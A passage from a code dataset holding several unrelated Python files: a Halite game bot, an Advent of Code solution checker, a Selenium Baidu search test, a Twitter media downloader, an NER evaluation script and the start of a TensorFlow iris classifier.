dist: \r\n                    continue\r\n                dist[processPoint] = dist[currentPoint] + 1\r\n                priority = dist[processPoint] + self.dist(processPoint,t)\r\n                pqMap[priority] = pqMap.get(priority,[])\r\n                pqMap[priority].append(processPoint)\r\n                pq.put(priority)\r\n                pred[processPoint] = currentPoint\r\n        \r\n        #TODO: Catch this case properly, or make sure it never happens. Don't just move randomly.\r\n        if t not in pred:\r\n            #Random move\r\n            for offX, offY in ((0,1),(1,0),(0,-1),(-1,0)):\r\n                processPoint = sPos.translate(Point(offX,offY),self.CFG.size)\r\n                if not blocked[processPoint.x][processPoint.y]:\r\n                    self.next[processPoint.x][processPoint.y] = 1\r\n                    return self.directionTo(sPos,processPoint)\r\n            self.next[sPos.x][sPos.y] = 1\r\n            return None\r\n\r\n        # Path reconstruction\r\n        while pred[t] != sPos:\r\n            t = pred[t]\r\n\r\n        desired = self.directionTo(sPos,t)\r\n        self.next[t.x][t.y] = 1\r\n        # Swapping: TODO - if an ally occupies t, a swap should be negotiated here\r\n        if calc.ally[t.x][t.y]:\r\n            pass\r\n        \r\n        return desired\r\n\r\nclass Calculator:\r\n\r\n    def __init__(self, board: Board):\r\n        self.CFG = board.configuration\r\n        self.me = board.current_player_id\r\n        self.playerNum = len(board.players)\r\n\r\n    def update(self, board: Board):\r\n        # Updates\r\n        self.board = board\r\n\r\n        # Encoding\r\n        self.encode()\r\n\r\n        # Calculate\r\n        self.haliteMean = np.mean(self.haliteMap, axis=None)\r\n        self.ally = self.shipMap[self.me]\r\n        self.allyShipyard = self.shipyardMap[self.me]\r\n        self.enemy = np.sum(self.shipMap, axis=0) - self.ally\r\n        self.enemyShipyard = np.sum(self.shipyardMap, axis=0) - self.allyShipyard\r\n        self.enemyShipHaliteMap()\r\n\r\n    # Encodes halite and units to matrices\r\n    def encode(self) -> None:\r\n        # Map\r\n        self.haliteMap = np.zeros((self.CFG.size, self.CFG.size))\r\n        self.shipMap = np.zeros((self.playerNum, self.CFG.size, self.CFG.size))\r\n        self.shipyardMap = np.zeros((self.playerNum, self.CFG.size, self.CFG.size))\r\n        for cell in self.board.cells.values():\r\n            self.haliteMap[cell.position.x][cell.position.y] = cell.halite\r\n        for ship in self.board.ships.values():\r\n            self.shipMap[ship.player_id][ship.position.x][ship.position.y] = 1\r\n        for shipyard in self.board.shipyards.values():\r\n            self.shipyardMap[shipyard.player_id][shipyard.position.x][shipyard.position.y] = 1\r\n\r\n        # TODO: Add encoding for individual ships and yards (not necessary now)\r\n        \r\n    # Calculations\r\n    \r\n    def enemyShipHaliteMap(self):\r\n        self.enemyShipHalite = np.zeros((self.CFG.size, self.CFG.size))\r\n        self.enemyShipHalite += np.Infinity\r\n        for ship in self.board.ships.values():\r\n            if ship.player_id != self.me:\r\n                self.enemyShipHalite[ship.position.x][ship.position.y] = ship.halite\r\n\r\n    def updateControlMap(self):  # renamed so it no longer overwrites itself; TODO: refactor\r\n        # TODO: Consider enemyShipHalite and shipyards\r\n        self.controlMap = self.ally - self.enemy\r\n        # TODO: avg pooling\r\n\r\n# %% [markdown]\r\n# # Agent\r\n\r\n# %%\r\ndef cost(ship, cell):\r\n    # TODO: much to improve\r\n    # We can probably RL this\r\n    cfg = environment.configuration\r\n    haliteCoef = cfg.size / cfg.maxCellHalite\r\n    return nav.dist(ship.position, cell.position) - haliteCoef * cell.halite\r\n\r\n@board_agent\r\ndef agent(board):\r\n    global nav, calc\r\n\r\n    if board.step == 0:\r\n        init = True\r\n        nav = Navigation(board)\r\n        calc = Calculator(board)\r\n\r\n    # Process map\r\n    calc.update(board)\r\n    nav.update()\r\n    ships = board.current_player.ships\r\n    shipyards = board.current_player.shipyards\r\n\r\n    # Decide tasks \r\n    # (priority,ship,targetLocation, type)\r\n    action = {}\r\n    miningCells = calc.haliteMap\r\n\r\n    # Terrible mining algorithm, should probably come up with something entirely new\r\n    assign = []\r\n    for i, ship in enumerate(ships):\r\n        if ship.cell.halite >= calc.haliteMean:\r\n            action[ship] = (900,ship,ship.cell.position,"mining")\r\n        else:\r\n            if ship.halite > 500 and len(shipyards) > 0:\r\n                action[ship] = (1000,ship,shipyards[0].position,"return")\r\n            else:\r\n                assign.append(ship)\r\n\r\n    miningCells = np.argpartition(miningCells, -len(assign),axis=None)[-len(assign):]\r\n    miningCells = miningCells.tolist()\r\n    miningCells = [board.cells[nav.unpack(i)] for i in miningCells]\r\n\r\n    costMatrix = np.array([[cost(ship, cell) for ship in assign] for cell in miningCells])\r\n    cellIdx, shipIdx = linear_sum_assignment(costMatrix)  # rows are cells, columns are ships\r\n    for c, si in zip(cellIdx, shipIdx):\r\n        ship = assign[si]\r\n        action[ship] = (500-cost(ship,miningCells[c]),ship,miningCells[c].position,"mining")\r\n\r\n\r\n    # Action process\r\n    action = list(action.values())\r\n    action.sort(reverse=True,key=lambda x : x[0])\r\n    for i in action:\r\n        i[1].next_action = nav.safeMoveTo(i[1],i[2])\r\n\r\n    if len(shipyards) == 0:\r\n        ships[0].next_action = ShipAction.CONVERT\r\n    for shipyard in shipyards:\r\n        if shipyard.cell.ship is None and not nav.next[shipyard.cell.position.x][shipyard.cell.position.y]:\r\n            shipyard.next_action = ShipyardAction.SPAWN\r\n\r\n# %% [markdown]\r\n# # Run\r\n", "sub_path": "old/py/bot0.2.py", "file_name": "bot0.2.py", "file_ext": "py", "file_size_in_byte": 11385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "kaggle_environments.make", "line_number": 23, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 157, "usage_type": "call"}, {"api_name": "queue.PriorityQueue", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.Infinity", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.argpartition", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "scipy.optimize.linear_sum_assignment", "line_number": 329, "usage_type": "call"}]}
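The mining assignment above builds a cells-by-ships cost matrix and solves it with `scipy.optimize.linear_sum_assignment` (the Hungarian method). A toy demonstration of that call, with made-up cost values:

```python
import numpy as np
from scipy.optimize import linear_sum_assignment

# rows = cells, cols = ships, entries = assignment cost (arbitrary toy values)
cost = np.array([[4., 1., 3.],
                 [2., 0., 5.],
                 [3., 2., 2.]])
rows, cols = linear_sum_assignment(cost)  # optimal one-to-one pairing
print(list(zip(rows, cols)))              # [(0, 1), (1, 0), (2, 2)]
print(cost[rows, cols].sum())             # minimal total cost: 5.0
```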
+{"seq_id": "113595191", "text": "import json\nfrom time import time\n\nwith open("solutions.json") as fp:\n    solutions = json.load(fp)\n\ndef check(day):\n    with open(f"days/day{day}.txt") as fp:\n        data = [x.strip() for x in fp.readlines()]\n    with open(f"days/day{day}.py") as fp:\n        new_globals = globals().copy()\n        exec(fp.read(), new_globals)\n    impls = new_globals["implementations"]\n    if len(impls) == 1:\n        print(f"\033[1mDay {day}: 1 implementation found.\033[0m")\n    else:\n        print(f"\033[1mDay {day}: {len(impls)} implementations found.\033[0m")\n    s_1, s_2 = solutions[day - 1]\n    for i, impl in enumerate(impls):\n        t = time()\n        p_1, p_2 = impl(data)\n        dt = time() - t\n        count = int(0.5 / (dt + 0.01)) + 1\n        total = 0\n        for _ in range(count):\n            t = time()\n            impl(data)\n            dt = time() - t\n            total += dt\n        mean = total / count\n        print(f"Implementation {i + 1} took {mean:.3} s:")\n        if p_1 == s_1:\n            print(f"- Part 1 \033[32;40;1mpassed\033[0m (got {p_1})")\n        else:\n            print(f"- Part 1 \033[31;40;1mfailed\033[0m (expected {s_1}, got {p_1})")\n        if p_2 == s_2:\n            print(f"- Part 2 \033[32;40;1mpassed\033[0m (got {p_2})")\n        else:\n            print(f"- Part 2 \033[31;40;1mfailed\033[0m (expected {s_2}, got {p_2})")\n\nday = input("Day to solve (omit to solve all): ").strip()\n\nif not day:\n    try:\n        for i in range(25):\n            check(i + 1)\n    except FileNotFoundError:\n        print("No more days found.")\nelse:\n    check(int(day))", "sub_path": "aoc.py", "file_name": "aoc.py", "file_ext": "py", "file_size_in_byte": 1694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}]}
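`check` above sizes its timing loop from a pilot run (`count = int(0.5 / (dt + 0.01)) + 1`), so fast solutions are averaged over more repeats. The same idea in isolation (the workload below is a placeholder):

```python
from time import time

def mean_runtime(fn, budget=0.5):
    """Average fn's runtime, choosing the repeat count from one pilot run."""
    t = time()
    fn()
    dt = time() - t                        # pilot measurement
    count = int(budget / (dt + 0.01)) + 1  # repeats that fit the time budget
    t = time()
    for _ in range(count):
        fn()
    return (time() - t) / count

print(mean_runtime(lambda: sum(range(10_000))))
```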
all): \").strip()\n\nif not day:\n try:\n for i in range(25):\n check(i + 1)\n except FileNotFoundError:\n print(\"No more days found.\")\nelse:\n check(int(day))", "sub_path": "aoc.py", "file_name": "aoc.py", "file_ext": "py", "file_size_in_byte": 1694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "431603903", "text": "# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest, time, re # 导入模块\n\n# 初始化\nclass BaiduTest(unittest.TestCase): \n\tdef setUp(self):\n\t\tself.driver = webdriver.Chrome() # 浏览器\n\t\tself.driver.implicitly_wait(30) # 隐形等待时间\n\t\tself.base_url = \"https://www.baidu.com/\" # 路由\n\t\tself.vertificationErrors = [] # 脚步运行的错误信息数组\n\t\tself.accept_next_alert = True # 是否接受下一个弹窗\n\n\tdef test_baidu(self):\n\t\tdriver = self.driver\n\t\tdriver.get(self.base_url + \"/\")\n\t\tdriver.find_element_by_id(\"kw\").clear()\n\t\tdriver.find_element_by_id(\"kw\").send_keys(\"selenium ide\")\n\t\tdriver.find_element_by_id(\"su\").click()\n\n\tdef is_element_present(self, how, what): # how-定位方法, what-定位值\n\t\ttry: # 异常处理\n\t\t\tself.driver.find_element_by_id(by=how, value=what)\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\t\treturn True\n\n\tdef is_alert_present(self):\n\t\ttry:\n\t\t\tself.driver.switch_to_alter() # 捕捉窗口的alert弹窗\n\t\texcept NoAlertPresentException:\n\t\t\treturn False\n\t\treturn True\n\n\tdef close_alter_and_get_its_text(self):\n\t\ttry:\n\t\t\talert = self.driver.switch_to_alter()\n\t\t\talert_text = alert.text # 获取当前页面的警告提示信息\n\t\t\tif self.accept_next_alert:\n\t\t\t\talert.accept()\n\t\t\telse:\n\t\t\t\talert.dismiss()\n\t\t\treturn alert_text\n\t\tfinally:\n\t\t\tself.accept_next_alert = True\n\n\tdef tearDown(self): # 清理工作\n\t\tself.driver.quit() # 退出浏览器\n\t\tself.assertEqual([], self.vertificationErrors)\n\nif __name__ == \"__main__\":\n\tunittest.main()", "sub_path": "10baidu.py", "file_name": "10baidu.py", "file_ext": "py", "file_size_in_byte": 1796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoAlertPresentException", "line_number": 36, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "323364191", "text": "# coding:utf-8\n\nfrom requests_oauthlib import OAuth1Session\nfrom configparser import ConfigParser\nfrom time import sleep\nimport json\nimport os\nimport sys\nimport urllib\nimport Consts\n\n\ncounter_image = 0\ncounter_video = 0\nroot_image = 
\"images/\"\nroot_video = \"videos/\"\npage_size = 200\n\ncfg = ConfigParser()\ncfg.read(Consts.configFile)\ntoken = cfg[\"token\"]\nscreen_name = cfg[\"account\"][\"screen_name\"]\noath_keys = {\n \"consumer_key\": token[Consts.CK],\n \"cousumer_secret\": token[Consts.CS],\n \"access_token\": token[Consts.AT],\n \"access_token_secret\": token[Consts.ATS]\n}\n\n\ndef craete_oath_session():\n return OAuth1Session(\n token[Consts.CK],\n token[Consts.CS],\n token[Consts.AT],\n token[Consts.ATS]\n )\n\n\n\"\"\"\nTweetをとってくるメソッドの\n\"\"\"\n\n\ndef access_api(url, params):\n sleep(1)\n oath = craete_oath_session()\n res = oath.get(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n\n\n\"\"\"\nブロックしているユーザーのリストをとってくる\n\"\"\"\n\n\ndef get_block_list(skip_status=True, cursor=-1):\n url = \"https://api.twitter.com/1.1/blocks/ids.json\"\n params = {\n \"skip_status\": skip_status,\n \"cursor\": cursor\n }\n oath = craete_oath_session()\n res = oath.get(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n\n\n\"\"\"\nユーザーの情報をとってくる\n\"\"\"\n\n\ndef get_user_info(id, include_entities=False):\n url = \"https://api.twitter.com/1.1/users/show.json\"\n params = {\n \"user_id\": id,\n \"include_entities\": include_entities\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーidからツイートをとってくる\n\"\"\"\n\n\ndef get_tweet(id):\n url = \"https://api.twitter.com/1.1/statuses/show.json\"\n params = {\n \"id\": id,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーのtweetリストをとってくる\n\"\"\"\n\n\ndef get_user_timeline(page, screen_name):\n url = \"https://api.twitter.com/1.1/statuses/user_timeline.json\"\n params = {\n \"screen_name\": screen_name,\n \"page\": page,\n \"count\": page_size,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nユーザーのfav画像をとってくる\n\"\"\"\n\n\ndef get_favorite_tweets(page, screen_name):\n url = \"https://api.twitter.com/1.1/favorites/list.json?\"\n params = {\n \"screen_name\": screen_name,\n \"page\": page,\n \"count\": page_size,\n \"include_entities\": 1,\n \"tweet_mode\": \"extended\"\n }\n return access_api(url, params)\n\n\n\"\"\"\nTwitterのtweetリストから画像と動画を保存する\nすでにあるものは無視\n\"\"\"\n\n\ndef save_media(save_account, tweets):\n global counter_image # 保存した画像の数\n global counter_video # 保存した動画の数\n for tw in tweets: # 全ツイートを処理\n try:\n media = tw[\"extended_entities\"][\"media\"] # 画像・動画オブジェクトの取得\n for media_path in media:\n if media_path[\"type\"] == \"photo\": # 画像の時\n save_path = \"./\" + save_account + \"/\" + \\\n root_image + tw[\"user\"][\"screen_name\"]\n # ツイート主用のディレクトリがなければ作成\n os.makedirs(save_path, exist_ok=True)\n url = media_path[\"media_url\"]\n url_large = url + \":large\"\n save_file_path = save_path + \"/\" + os.path.basename(url)\n if os.path.exists(save_file_path):\n print(\"skip image : {url}\".format(url=save_file_path))\n break\n with open(save_file_path, \"wb\") as f:\n img = urllib.request.urlopen(\n url_large, timeout=20).read()\n f.write(img)\n counter_image += 1\n print(\"saved image [{num: 4d}] : {url}\".format(\n num=counter_image, url=save_file_path))\n\n elif media_path[\"type\"] == \"video\" or media_path[\"type\"] == \"animated_gif\": # 動画の時\n save_path = \"./\" + save_account + \"/\" + \\\n root_video + tw[\"user\"][\"screen_name\"]\n # ツイート主用のディレクトリがなければ作成\n 
os.makedirs(save_path, exist_ok=True)\n # 動画の中でbitrateが最大のmp4動画のurlを得る\n url = max([i for i in media_path[\"video_info\"][\"variants\"]\n if i[\"content_type\"] == \"video/mp4\"], key=lambda e: e[\"bitrate\"])[\"url\"]\n # 保存URLの生成 パラメータ削除\n save_file_path = (save_path + \"/\" +\n os.path.basename(url)).split(\"?\")[0]\n if os.path.exists(save_file_path):\n print(\"skip video : {url}\".format(url=save_file_path))\n break\n with open(save_file_path, \"wb\") as f:\n vdo = urllib.request.urlopen(url, timeout=180).read()\n f.write(vdo)\n counter_video += 1\n print(\"saved video [{num: 4d}] : {url}\".format(\n num=counter_video, url=save_file_path))\n\n except (KeyError, ValueError)as e:\n pass\n\n except urllib.error.HTTPError:\n with open(\"Error.txt\", \"a\") as f:\n f.write(\"HTTP error : \" + url)\n\n\n\"\"\"\n指定のユーザーのfavTweetをとってきて\nメディアを保存するメソッドに投げる\n\"\"\"\n\n\ndef get_medias(end):\n for i in range(0, end):\n for j in screen_name.split(\",\"):\n save_media(j, get_favorite_tweets(i+1, j))\n print(\"saved {num} images\".format(num=counter_image))\n print(\"saved {num} videos\".format(num=counter_video))\n\n\ndef update_profile(description, name):\n url = \"https://api.twitter.com/1.1/account/update_profile.json?\"\n params = {\n \"name\": name,\n \"description\": description\n }\n oath = craete_oath_session()\n res = oath.post(url, params=params)\n if res.status_code != 200:\n print(\"Error : {0}\".format(res.status_code))\n return None\n return json.loads(res.text)\n", "sub_path": "TwitterAPI.py", "file_name": "TwitterAPI.py", "file_ext": "py", "file_size_in_byte": 6626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "configparser.ConfigParser", "line_number": 19, "usage_type": "call"}, {"api_name": "Consts.configFile", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Consts.CK", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Consts.CS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Consts.AT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Consts.ATS", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests_oauthlib.OAuth1Session", "line_number": 32, "usage_type": "call"}, {"api_name": "Consts.CK", "line_number": 33, "usage_type": "attribute"}, {"api_name": "Consts.CS", "line_number": 34, "usage_type": "attribute"}, {"api_name": "Consts.AT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Consts.ATS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 162, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 180, 
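`save_media` above picks the highest-bitrate mp4 among a tweet's video variants with `max(..., key=lambda e: e["bitrate"])`. That selection in isolation (the variant dicts are made-up samples in the shape Twitter's API returns):

```python
variants = [
    {"content_type": "video/mp4", "bitrate": 832000,
     "url": "https://example.com/v832.mp4"},
    {"content_type": "application/x-mpegURL",
     "url": "https://example.com/playlist.m3u8"},  # no bitrate key
    {"content_type": "video/mp4", "bitrate": 2176000,
     "url": "https://example.com/v2176.mp4"},
]

best = max((v for v in variants if v["content_type"] == "video/mp4"),
           key=lambda v: v["bitrate"])
print(best["url"])  # -> https://example.com/v2176.mp4
```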
"usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 184, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 184, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 193, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "492024309", "text": "import re\nimport Levenshtein\n\n# PER '|' , LOC '$' , ORG '{'\n\ndef get_cer(tar, pred):\n for x in '$|{]':\n tar.replace(x, '')\n pred.replace(x, '')\n\n return Levenshtein.distance(tar, pred), len(tar)\n\n\ndef get_ne_cer(tar, pred):\n distance = 0\n length = 0\n\n for t, p in zip(tar, pred):\n t = t.replace(' ', '')\n p = p.replace(' ', '')\n\n if len(tar) == len(pred):\n for t, p in zip(tar, pred):\n distance += Levenshtein.distance(t, p)\n length += len(t)\n\n elif len(tar) < len(pred):\n for t in tar:\n distance += min(map(lambda x: Levenshtein.distance(t, x), pred))\n length += len(t)\n\n elif len(tar) > len(pred):\n for p in pred:\n candidates = list(map(lambda x: Levenshtein.distance(p, x), tar))\n optimal = min(candidates)\n distance += optimal\n length += len(tar[candidates.index(optimal)])\n\n return distance, length\n\n\ndef get_f1_precision(tar, pred):\n if len(pred) == 0:\n return 0, 0\n if len(tar) == 0:\n return 0, len(pred)\n\n count = 0\n for p in pred:\n if min(map(lambda x: Levenshtein.distance(p, x), tar)) <= 1:\n count += 1\n\n return count, len(pred)\n\n\ndef get_f1_recall(tar, pred):\n if len(pred) == 0:\n return 0, len(tar)\n if len(tar) == 0:\n return 0, 0\n\n count = 0\n for t in tar:\n if min(map(lambda x: Levenshtein.distance(t, x), pred)) <= 1:\n count += 1\n\n return count, len(tar)\n\n\n# ---------- read data -----------\nf = open(\"E2E/TEST/true_transcripts.txt\", 'rt', encoding=\"cp949\")\nf2 = open(\"E2E/TEST/predictions.txt\", 'rt', encoding=\"utf8\")\n\ntargets = f.readlines()\npredictions = f2.readlines()\n\npredictions = [line.split('\\t')[1] for i, line in enumerate(predictions) if line.split('\\t')[0] == targets[i]]\n\n# ---------- statistics ----------\n\n# CER\ntotal_distance = 0\ntotal_length = 0\n\nne_distance = 0\nne_length = 0\n\nper_distance = 0\nper_length = 0\n\nloc_distance = 0\nloc_length = 0\n\norg_distance = 0\norg_length = 0\n\nper_cnt = 0\nloc_cnt = 0\norg_cnt = 0\n\n# F1\nprecision_cnt = 0\nprecision_len = 0\nrecall_cnt = 0\nrecall_len = 0\n\nper_precision_cnt = 0\nper_precision_len = 0\nper_recall_cnt = 0\nper_recall_len = 0\n\nloc_precision_cnt = 0\nloc_precision_len = 0\nloc_recall_cnt = 0\nloc_recall_len = 0\n\norg_precision_cnt = 0\norg_precision_len = 0\norg_recall_cnt = 0\norg_recall_len = 0\n\nfor target, prediction in zip(targets, predictions):\n # -------------- check CER ---------------\n PER = re.findall('\\|.*?(\\n|]| .*? )', target)\n LOC = re.findall('\\$.*?(\\n|]| .*? )', target)\n ORG = re.findall('\\{.*?(\\n|]| .*? )', target)\n\n P_PER = re.findall('\\|.*?(\\n|]| .*? )', prediction)\n P_LOC = re.findall('\\$.*?(\\n|]| .*? )', prediction)\n P_ORG = re.findall('\\{.*?(\\n|]| .*? 
)', prediction)\n\n dist, length = get_cer(target, prediction)\n total_distance += dist\n total_length += length\n\n dist, length = get_ne_cer(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n ne_distance += dist\n ne_length += length\n\n dist, length = get_ne_cer(PER, P_PER)\n per_distance += dist\n per_length += length\n\n dist, length = get_ne_cer(LOC, P_LOC)\n loc_distance += dist\n loc_length += length\n\n dist, length = get_ne_cer(ORG, P_ORG)\n org_distance += dist\n org_length += length\n\n per_cnt += len(P_PER)\n loc_cnt += len(P_LOC)\n org_cnt += len(P_ORG)\n\n # --------------- check F1 ---------------\n p_cnt, p_len = get_f1_precision(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n r_cnt, r_len = get_f1_recall(PER + LOC + ORG, P_PER + P_LOC + P_ORG)\n precision_cnt += p_cnt\n precision_len += p_len\n recall_cnt += r_cnt\n recall_len += r_len\n print('***')\n print(recall_cnt)\n print(recall_len)\n\n per_p_cnt, per_p_len = get_f1_precision(PER, P_PER)\n per_r_cnt, per_r_len = get_f1_recall(PER, P_PER)\n per_precision_cnt += per_p_cnt\n per_precision_len += per_p_len\n per_recall_cnt += per_r_cnt\n per_recall_len += per_r_len\n\n loc_p_cnt, loc_p_len = get_f1_precision(LOC, P_LOC)\n loc_r_cnt, loc_r_len = get_f1_recall(LOC, P_LOC)\n loc_precision_cnt += loc_p_cnt\n loc_precision_len += loc_p_len\n loc_recall_cnt += loc_r_cnt\n loc_recall_len += loc_r_len\n\n org_p_cnt, org_p_len = get_f1_precision(ORG, P_ORG)\n org_r_cnt, org_r_len = get_f1_recall(ORG, P_ORG)\n org_precision_cnt += org_p_cnt\n org_precision_len += org_p_len\n org_recall_cnt += org_r_cnt\n org_recall_len += org_r_len\n\nprint('------------------TEST RESULTS-------------------')\nprint('validation set size: {:d}'.format(len(targets)))\n\nprint('\\ntotal CER: {:.3f}'.format(total_distance / total_length))\n\nprint('\\n-- tags: {:d}'.format(per_cnt + loc_cnt + org_cnt))\nprint('named-entity CER: {:.3f}'.format(ne_distance / ne_length))\n\nprecision = precision_cnt / precision_len\nrecall = recall_cnt / recall_len\nprint('\\nF1 score: {:.3f}'.format(2 * precision * recall / (precision + recall)))\nprint('precision: {:.3f}'.format(precision))\nprint('recall: {:.3f}'.format(recall))\n\nprint('\\n-- PER tags: {:d}'.format(per_cnt))\nif per_cnt > 0:\n per_precision = per_precision_cnt / per_precision_len\n per_recall = per_recall_cnt / per_recall_len\n print('PER tag CER: {:.3f}'.format(per_distance / per_length))\n print('\\nPER F1 score: {:.3f}'.format(2 * per_precision * per_recall / (per_precision + per_recall)))\n print('PER precision: {:.3f}'.format(per_precision))\n print('PER recall: {:.3f}'.format(per_recall))\n\nprint('\\n-- LOC tags: {:d}'.format(loc_cnt))\nif loc_cnt > 0:\n loc_recall = loc_recall_cnt / loc_recall_len\n loc_precision = loc_precision_cnt / loc_precision_len\n print('LOC tag CER: {:.3f}'.format(loc_distance / loc_length))\n print('\\nLOC F1 score: {:.3f}'.format(2 * loc_precision * loc_recall / (loc_precision + loc_recall)))\n print('LOC precision: {:.3f}'.format(loc_precision))\n print('LOC recall: {:.3f}'.format(loc_recall))\n\nprint('\\n-- ORG tags: {:d}'.format(org_cnt))\nif org_cnt > 0:\n org_precision = org_precision_cnt / org_precision_len\n org_recall = org_recall_cnt / org_recall_len\n print('ORG tag CER: {:.3f}'.format(org_distance / org_length))\n print('\\nORG F1 score: {:.3f}'.format(2 * org_precision * org_recall / (org_precision + org_recall)))\n print('ORG precision: {:.3f}'.format(org_precision))\n print('ORG recall: {:.3f}'.format(org_recall))\n", "sub_path": "TEST.py", "file_name": 
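The script above reports CER as Levenshtein distance divided by reference length, and near-match F1 using a distance threshold of 1. A minimal check of the CER arithmetic with the same `Levenshtein` package (example strings only):

```python
import Levenshtein

ref = "hello world"
hyp = "helo wurld"
dist = Levenshtein.distance(ref, hyp)  # 2 edits: one deletion, one substitution
print(dist / len(ref))                 # CER = 2 / 11, about 0.182
```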
"TEST.py", "file_ext": "py", "file_size_in_byte": 6421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Levenshtein.distance", "line_number": 11, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 24, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 29, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 34, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 50, "usage_type": "call"}, {"api_name": "Levenshtein.distance", "line_number": 64, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 124, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 125, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 126, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 128, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 129, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "644235062", "text": "# 다중분류\n# iris 코드를 완성하시오\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior() #2.0기능 없애기\ntf.compat.v1.disable_eager_execution()\n# 1. 데이터\niris = load_iris()\nx_data = iris.data\ny_data = iris.target\n# print(x_data.shape) # (150, 4)\n# print(y_data.shape) # (150, )\n# print(y_data) # 0,1,2 3개분류\n\n# 1-1. y데이터 